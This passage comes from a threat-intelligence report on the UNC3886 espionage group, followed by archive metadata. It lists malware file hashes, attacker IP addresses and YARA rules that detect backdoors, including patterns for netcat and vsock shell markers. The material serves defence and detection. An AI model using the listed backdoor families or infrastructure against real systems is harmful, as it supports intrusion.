129ba90886c5f5eb0c81d901ad10c622   UTILITY\r\nsendPacket.py 0f76936e237bd87dfa2378106099a673   UTILITY\r\nu.py d18a5f1e8c321472a31c27f4985834a4   UTILITY\r\nvmware_ntp.sh 4ddca39b05103aeb075ebb0e03522064   LAUNCHER\r\nwp 0e43a0f747a60855209b311d727a20bf GHOSTTOWN UTILITY\r\naububbaditd 1d89b48548ea1ddf0337741ebdb89d92 LOOKOVER SNIFFER\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 17 of 26\n\nbubba_sniffer ecb34a068eeb2548c0cbe2de00e53ed2 LOOKOVER SNIFFER\r\nksbubba 89339821cdf6e9297000f3e6949f0404 MOPSLED.LINUX BACKDOOR\r\nksbubba.service c870ea6a598c12218e6ac36d791032b5 MOPSLED.LINUX LAUNCHER\r\n99-bubba.rules 1079d416e093ba40aa9e95a4c2a5b61f REPTILE LAUNCHER\r\nadmin ed9be20fea9203f4c4557c66c5b9686c REPTILE BACKDOOR\r\nauthd 568074d60dd4759e963adc5fe9f15eb1 REPTILE BACKDOOR\r\nbubba 4d5e4f64a9b56067704a977ed89aa641 REPTILE LAUNCHER\r\nbubba_icmp 1b7aee68f384e252286559abc32e6dd1 REPTILE BACKDOOR\r\nbubba_loader b754237c7b5e9461389a6d960156db1e REPTILE BACKDOOR\r\nclient f41ad99b8a8c95e4132e850b3663cb40 REPTILE BACKDOOR\r\ndash 48f9bbdb670f89fce9c51ad433b4f200 REPTILE LAUNCHER\r\nlistener 4fb72d580241f27945ec187855efd84a REPTILE BACKDOOR\r\npacket e2cdf2a3380d0197aa11ff98a34cc59e REPTILE CONTROLLER\r\nauthdd fd3834d566a993c549a13a52d843a4e1 REPTILE.SHELL BACKDOOR\r\nauthdd 4282de95cc54829d7ac275e436e33b78 REPTILE.SHELL BACKDOOR\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 18 of 26\n\nbubba_reverse c9c00c627015bd78fda22fa28fd11cd7 REPTILE.SHELL BACKDOOR\r\nunknown 047ac6aebe0fe80f9f09c5c548233407 REPTILE.SHELL BACKDOOR\r\nusbubbaxd bca2ccff0596a9f102550976750e2a89 RIFLESPINE BACKDOOR\r\naudit 3a8a60416b7b0e1aa5d17eefb0a45a16 TINYSHELL CONTROLLER\r\nlang_ext 6e248f5424810ea67212f1f2e4616aa5 TINYSHELL BACKDOOR\r\nsync 5d232b72378754f7a6433f93e6380737 TINYSHELL CONTROLLER\r\nx64 3c7316012cba3bbfa8a95d7277cda873 VIRTUALGATE DROPPER\r\nndc4961 9c428a35d9fc1fdaf31af186ff6eec08 VIRTUALPEER UTILITY\r\nlsu_lsi_.v05 2716c60c28cf7f7568f55ac33313468b VIRTUALPIE ARCHIVE\r\nvmsyslog.py 61ab3f6401d60ec36cd3ac980a8deb75 VIRTUALPIE BACKDOOR\r\nvmware_local.sh bd6e38b6ff85ab02c1a4325e8af29ce4 VIRTUALPIE LAUNCHER\r\ncleanupStatefulHost.sh 9ef5266a9fdd25474227c3e33b8e6d77 VIRTUALPITA LAUNCHER\r\nclient a7cd7b61d13256f5478feb28ab34be72 VIRTUALPITA BACKDOOR\r\nduci cd3e9e4df7e607f4fe83873b9d1142e3 VIRTUALPITA BACKDOOR\r\npayload1 62bed88bd426f91ddbbbcfcd8508ed6a VIRTUALPITA ARCHIVE\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 19 of 26\n\nrdt 8e80b40b1298f022c7f3a96599806c43 VIRTUALPITA BACKDOOR\r\nrhttpproxy c9f2476bf8db102fea7310abadeb9e01 VIRTUALPITA BACKDOOR\r\nrhttpproxy-IO 2c28ec2d541f555b2838099ca849f965 VIRTUALPITA BACKDOOR\r\nrpci 2bade2a5ec166d3a226761f78711ce2f VIRTUALPITA BACKDOOR\r\nssh 969d7f092ed05c72f27eef5f2c8158d6 VIRTUALPITA BACKDOOR\r\nnds4961l.so 084132b20ed65b2930129b156b99f5b3 VIRTUALSHINE BACKDOOR\r\nNetwork-Based Indicators\r\nIPv4 ASN Netblock\r\n8.222.218.20 45102 Alibaba\r\n8.222.216.144 45102 Alibaba\r\n8.219.131.77 45102 Alibaba\r\n8.219.0.112 45102 Alibaba\r\n8.210.75.218 45102 Alibaba\r\n8.210.103.134 45102 Alibaba\r\n47.252.54.82 45102 Alibaba\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 20 of 26\n\n47.251.46.35 45102 Alibaba\r\n47.246.68.13 45102 Alibaba\r\n47.243.116.155 45102 Alibaba\r\n47.241.56.157 45102 Alibaba\r\n45.77.106.183 20473 Choopa, LLC\r\n45.32.252.98 20473 Choopa, LLC\r\n207.246.64.38 20473 Choopa, LLC\r\n149.28.122.119 20473 Choopa, LLC\r\n155.138.161.47 20473 Gigabit Hosting Sdn Bhd\r\n154.216.2.149 55720 Gigabit Hosting Sdn Bhd\r\n103.232.86.217 55720 Gigabit Hosting Sdn Bhd\r\n103.232.86.210 55720 Gigabit Hosting Sdn Bhd\r\n103.232.86.209 55720 Gigabit Hosting Sdn Bhd\r\n58.64.204.165 17444 HKBN Enterprise Solutions Limited\r\n58.64.204.142 17444 HKBN Enterprise Solutions Limited\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 21 of 26\n\n58.64.204.139 17444 HKBN Enterprise Solutions Limited\r\n165.154.7.145 135377 Ucloud Information Technology Hk Limited\r\n165.154.135.108 135377 Ucloud Information Technology Hk Limited\r\n165.154.134.40 135377 Ucloud Information Technology Hk Limited\r\n152.32.231.251 135377 Ucloud Information Technology Hk Limited\r\n152.32.205.208 135377 Ucloud Information Technology Hk Limited\r\n152.32.144.15 135377 Ucloud Information Technology Hk Limited\r\n152.32.129.162 135377 Ucloud Information Technology Hk Limited\r\n123.58.207.86 135377 Ucloud Information Technology Hk Limited\r\n123.58.196.34 135377 Ucloud Information Technology Hk Limited\r\n118.193.63.40 135377 Ucloud Information Technology Hk Limited\r\n118.193.61.71 135377 Ucloud Information Technology Hk Limited\r\n118.193.61.178 135377 Ucloud Information Technology Hk Limited\r\nYARA Rules\r\nrule M_Sniffer_LOOKOVER_1 {\r\nmeta:\r\n author = \"Mandiant\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 22 of 26\n\nstrings:\r\n $str1 = \"TKEY\"\r\n $str2 = \"FILTER\"\r\n $str3 = \"DEVICE\"\r\n $str4 = \"SNFILENAME\"\r\n $str5 = \"/var/lib/libsyslog.so\"\r\n $code = {8B 55 F8 48 8B 45 E8 48 01 C2 8B 45 FC 48 8D 0C 85 00 00 00 00\r\n48 8B 45 E0 48 01 C8 8B 00 88 02 8B 45 F8 83 C0 01 89 C2 48 8B 45 E8 48 01\r\nC2 8B 45 FC 48 8D 0C 85 00 00 00 00 48 8B 45 E0 48 01 C8 8B 00 C1 E8 08 88\r\n02 8B 45 F8 83 C0 02 89 C2 48 8B 45 E8 48 01 C2 8B 45 FC 48 8D 0C 85 00 00\r\n00 00 48 8B 45 E0 48 01 C8 8B 00 C1 E8 10 88 02 8B 45 F8 83 C0 03 89 C2 48\r\n8B 45 E8 48 01 C2 8B 45 FC 48 8D 0C 85 00 00 00 00 48 8B 45 E0 48 01 C8 8B\r\n00 C1 E8 18 88 02 83 45 FC 01 83 45 F8 04}\r\ncondition:\r\n uint32(0) == 0x464c457f and filesize \u003c 5MB and all of them\r\n}\r\nrule M_Utility_GHOSTTOWN_1 {\r\nmeta:\r\n author = \"Mandiant\"\r\nstrings:\r\n $code1 = { 2F 76 61 72 2F 6C 6F 67 }\r\n $code2 = { 2F 76 61 72 2F 72 75 6E }\r\n $debug1 = \"=== results ===\" ascii\r\n $debug2 = \"=== %s ===\" ascii\r\n $debug3 = \"searching record in file %s\" ascii\r\n $debug4 = \"record not matched, not modifing %s\" ascii\r\n $debug5 = \"delete %d records in %s\" ascii\r\n $debug6 = \"NEVER_LOGIN\" ascii\r\n $debug7 = \"you need to specify a username to clear\" ascii\r\n $pattern1 = \"%-10s%-10s%-10s%-20s%-10s\" ascii\r\n $pattern2 = \"%-15s%-10s%-15s%-10s\" ascii\r\ncondition:\r\n uint32(0) == 0x464C457F and all of them\r\n}\r\nrule M_Utility_VIRTUALPEER_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n strings:\r\n $vmci_socket_family = {B? 00 00 00 00 B? 02 00 00 00 B? 28 00\r\n00 00 e8 [4-128] B? 00 00 00 00 48 8d [5] b? 00 00 00 00 e8 [4-64] B?\r\n00 00 00 00 48 8d [5] b? 00 00 00 00 e8 [4-64] B? B8 07 00 00 [0-8] b?\r\n00 00 00 00 e8}\r\n $vmci_socket_marker1 = \"/dev/vsock\" ascii wide\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 23 of 26\n\n$vmci_socket_marker2 = \"/vmfs/devices/char/vsock/vsock\"\r\nascii wide\r\n $vmci_socket_init_bind_listen = {e8 [4] 89 45 [4-64] 8B 45 ?? b?\r\n00 00 00 00 b? 01 00 00 00 [0-4] e8 [4-128] B? 10 00 00 00 [1-16] e8\r\n[4-128] BE 01 00 00 00 [1-16] e8 [4] 83 F8 FF}\r\n $socket_read_write = {BA 01 00 00 00 48 89 CE 89 C7 E8 [4] 48\r\n85 C0 [1-64] BA 01 00 00 00 48 89 CE 89 C7 E8 [4] 48 85 C0 7e ?? eb}\r\n $marker1 = \"nc \u003cport\u003e\"\r\n condition:\r\n uint32(0) == 0x464c457f and all of them\r\n \r\n}\r\nrule M_Hunting_VIRTUALPITA_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n strings:\r\n $forpid = { 70 69 64 20 [0-10] 69 6E 20 60 [0-10] 70 73 20 2D [0-10]\r\n63 20 7C 20 [0-10] 67 72 65 70 [0-10] 20 76 6D 73 [0-10] 79 73 6C 6F [0-10]\r\n67 64 20 7C [0-10] 20 61 77 6B [0-10] 20 27 7B 20 [0-10] 70 72 69 6E [0-10]\r\n74 20 24 31 [0-10] 20 7D 27 60 [0-10] 3B 20 64 6F [0-10] 20 6B 69 6C [0-10]\r\n6C 20 2D 39 [0-10] 20 24 70 69 [0-10] 64 3B 20 64 [0-10] 6F 6E 65 00 }\r\n $vmsyslogd = { 2F 75 73 72 [0-10] 2F 6C 69 62 [0-10] 2F 76 6D 77\r\n[0-10] 61 72 65 2F [0-10] 76 6D 73 79 [0-10] 73 6C 6F 67 [0-10] 2F 62 69 6E\r\n[0-10] 2F 76 6D 73 [0-10] 79 73 6C 6F [0-10] 67 64 00 00 }\r\n condition:\r\n uint32(0) == 0x464c457f and any of them\r\n}\r\nrule M_APT_Launcher_REPTILE_1 {\r\nmeta:\r\n author = \"Mandiant\"\r\nstrings:\r\n $str1 = {B8 00 00 00 00 E8 A1 FE FF FF 48 8B 85 40 FF FF FF 48\r\n83 C0 08 48 8B 00 BE 00 00 00 00 48 89 C7 B8 00 00 00 00 E8 ??\r\nFD FF FF 89 45 ?8 48 8D 95 50 FF FF FF 8B 45 ?8 48 89 D6 89 C7\r\nE8 ?? 0? 00 00 48 8B 45 80 48 89 45 F0 48 8B 45 F0 48 89 C7 E8\r\n?? F? FF FF 48 89 45 ?8 48 8B 55 F0 48 8B 4D ?8 8B 45 ?8 48 89\r\nCE 89 C7 E8 ?? FC FF FF 48 8B 55 F0 48 8B 45 ?8 B9 4? 0C 40 00\r\n48 89 C6 BF AF 00 00 00 B8 00 00 00 00 E8 ?? FC FF FF E8 ?? FC\r\nFF FF 8B 00 83 F8 25 75 07 C7 45 ?C 00 00 00 00 }\r\n $str2 = {81 7D F? FF 03 00 00 7E E9 BE 02 00 00 00 BF ?? 0C 40\r\n00 B8 00 00 00 00 E8 ?? F? FF FF 89 45 F? 8B 45 F? BE 01 00 00\r\n00 89 C7 E8 ?? FD FF FF 8B 45 F? BE 02 00 00 00 89 C7 E8 ?? F?\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 24 of 26\n\nFF FF C9 C3}\r\ncondition:\r\n uint32(0) == 0x464C457F and all of them\r\n}\r\nrule M_APT_Backdoor_VIRTUALSHINE_1 {\r\n meta:\r\n author = \"Mandiant\"\r\nstrings:\r\n$str1 = \"/dev/vsock\"\r\n$str2 = \"/vmfs/devices/char/vsock/vsock\"\r\n$str3 = \"nds4961l \u003ccid\u003e \u003cvport\u003e\"\r\n$str4 = \"[!] VMCISock_GetAFValue().\"\r\n$str5 = \"[+] Connected to server.[ %s:%s ]\"\r\n$str6 = \"TERM=xterm\"\r\n$str7 = \"PWD=/tmp/\"\r\ncondition:\r\nuint32(0) == 0x464C457F and all of them\r\n \r\n}\r\nrule M_APT_BACKDOOR_MOPSLED_1\r\n{\r\nmeta:\r\nauthor = \"Mandiant\"\r\nstrings:\r\n$x = { e8 ?? ?? ?? ?? 85 c0 0f 85 ?? ?? ?? ?? 4? 8d ?? ?4 ?8\r\nbe ?? ?? ?? ?? e8 ?? ?? ?? ?? 84 c0 0f 84 ?? ?? ?? ?? 4? 8b 94 ?? ?? ?? ??\r\n?? 4? 8b 44 ?? ?? 4? 89 e1 [0-6] be ?? ?? ?? ?? b? ?? ?? ?? ?? 4? 89 10 8b\r\n94 ?? ?? ?? ?? ?? [0-6] 89 50 08 4? 8b 54 ?? ?? c7 42 0c ?? ?? ?? ?? e8\r\n?? ?? ?? ?? }\r\n condition:\r\n uint32(0) == 0x464c457f and uint8(4) == 2 and filesize \u003c 5MB and $x\r\n}\r\nrule M_APT_BACKDOOR_MOPSLED_1\r\n{\r\nmeta:\r\nauthor = \"Mandiant\"\r\nstrings:\r\n$x = { e8 ?? ?? ?? ?? 85 c0 0f 85 ?? ?? ?? ?? 4? 8d ?? ?4\r\n?8 be ?? ?? ?? ?? e8 ?? ?? ?? ?? 84 c0 0f 84 ?? ?? ?? ?? 4? 8b 94\r\n?? ?? ?? ?? ?? 4? 8b 44 ?? ?? 4? 89 e1 [0-6] be ?? ?? ?? ?? b? ?? ??\r\n?? ?? 4? 89 10 8b 94 ?? ?? ?? ?? ?? [0-6] 89 50 08 4? 8b 54 ?? ??\r\nc7 42 0c ?? ?? ?? ?? e8 ?? ?? ?? ?? }\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 25 of 26\n\ncondition:\r\n uint32(0) == 0x464c457f and uint8(4) == 2 and filesize \u003c 5MB and $x\r\n}\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 26 of 26\n\n https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations \n47.251.46.35 45102 Alibaba \n47.246.68.13 45102 Alibaba \n47.243.116.155 45102 Alibaba \n47.241.56.157 45102 Alibaba \n45.77.106.183 20473 Choopa, LLC \n45.32.252.98 20473 Choopa, LLC \n207.246.64.38 20473 Choopa, LLC \n149.28.122.119 20473 Choopa, LLC \n155.138.161.47 20473 Gigabit Hosting Sdn Bhd\n154.216.2.149 55720 Gigabit Hosting Sdn Bhd\n103.232.86.217 55720 Gigabit Hosting Sdn Bhd\n103.232.86.210 55720 Gigabit Hosting Sdn Bhd\n103.232.86.209 55720 Gigabit Hosting Sdn Bhd\n58.64.204.165 17444 HKBN Enterprise Solutions Limited\n58.64.204.142 17444 HKBN Enterprise Solutions Limited\n Page 21 of 26", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MITRE" ], "references": [ "https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations" ], "report_names": [ "uncovering-unc3886-espionage-operations" ], "threat_actors": [ { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "9df8987a-27fc-45c5-83b0-20dceb8288af", "created_at": "2025-10-29T02:00:51.836932Z", "updated_at": "2026-04-10T02:00:05.253487Z", "deleted_at": null, "main_name": "UNC3886", "aliases": [ "UNC3886" ], "source_name": "MITRE:UNC3886", "tools": [ "MOPSLED", "VIRTUALPIE", "CASTLETAP", "THINCRUST", "VIRTUALPITA", "RIFLESPINE" ], "source_id": "MITRE", "reports": null }, { "id": "a08d93aa-41e4-4eca-a0fd-002d051a2c2d", "created_at": "2024-08-28T02:02:09.711951Z", "updated_at": "2026-04-10T02:00:04.957678Z", "deleted_at": null, "main_name": "UNC3886", "aliases": [ "Fire Ant" ], "source_name": "ETDA:UNC3886", "tools": [ "BOLDMOVE", "CASTLETAP", "LOOKOVER", "MOPSLED", "RIFLESPINE", "TABLEFLIP", "THINCRUST", "Tiny SHell", "VIRTUALGATE", "VIRTUALPIE", "VIRTUALPITA", "VIRTUALSHINE", "tsh" ], "source_id": "ETDA", "reports": null }, { "id": "1c91699d-77d3-4ad7-9857-9f9196ac1e37", "created_at": "2023-11-04T02:00:07.663664Z", "updated_at": "2026-04-10T02:00:03.385989Z", "deleted_at": null, "main_name": "UNC3886", "aliases": [], "source_name": "MISPGALAXY:UNC3886", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31", "created_at": "2023-01-06T13:46:38.376868Z", "updated_at": "2026-04-10T02:00:02.949077Z", "deleted_at": null, "main_name": "Cleaver", "aliases": [ "G0003", "Operation Cleaver", "Op Cleaver", "Tarh Andishan", "Alibaba", "TG-2889", "Cobalt Gypsy" ], "source_name": "MISPGALAXY:Cleaver", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434367, "ts_updated_at": 1775791966, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/51672fafe669cf99d78fbf7393084e04cf008325.pdf", "text": "https://archive.orkl.eu/51672fafe669cf99d78fbf7393084e04cf008325.txt", "img": "https://archive.orkl.eu/51672fafe669cf99d78fbf7393084e04cf008325.jpg" } }